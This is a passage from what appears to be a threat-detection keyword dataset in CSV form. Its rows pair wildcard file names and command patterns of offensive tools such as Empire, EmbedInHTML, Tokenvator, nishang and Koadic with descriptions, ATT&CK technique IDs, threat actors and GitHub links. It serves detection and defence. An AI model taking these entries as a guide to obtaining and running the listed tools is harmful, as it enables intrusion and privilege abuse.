TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*EmailAll-master.*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*embedInHTML.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*embedInHTML.py*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*EmbedInHTML-master*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*empire AttackServers*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*Empire Framework 
GUI*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" +"*empire --rest *","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*empire --server *","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" 
+"*Empire.Agent.Coms.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Empire.Agent.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Empire.Agent.Jobs.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Empire.Agent.Stager.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*empire/client/*.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 
- T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire/server/*.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - 
MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire/server/downloads/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire/server/downloads/logs/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - 
T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire_exec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*empire_server.*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 
- T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empireadmin*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire-chain.pem*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to 
aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*EmpireCORSMiddleware*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - 
T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*Empire-GUI.git*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" +"*Empire-master*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*empire-priv.key*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - 
T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*EmpireProject*","offensive_tool_keyword","empire","Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. 
PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.","T1027 - T1059 - T1071 - T1070 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Empire-Sponsors.git*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire-test-kalirolling*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - 
T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*emptybowl.py*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","1","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*enable_persistence.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*Enable_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*EnableAllParentPrivileges.c*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*EnableAllParentPrivileges.exe*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*Enabled_Users1.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Enable-DuplicateToken*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*EnableRDesktopImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 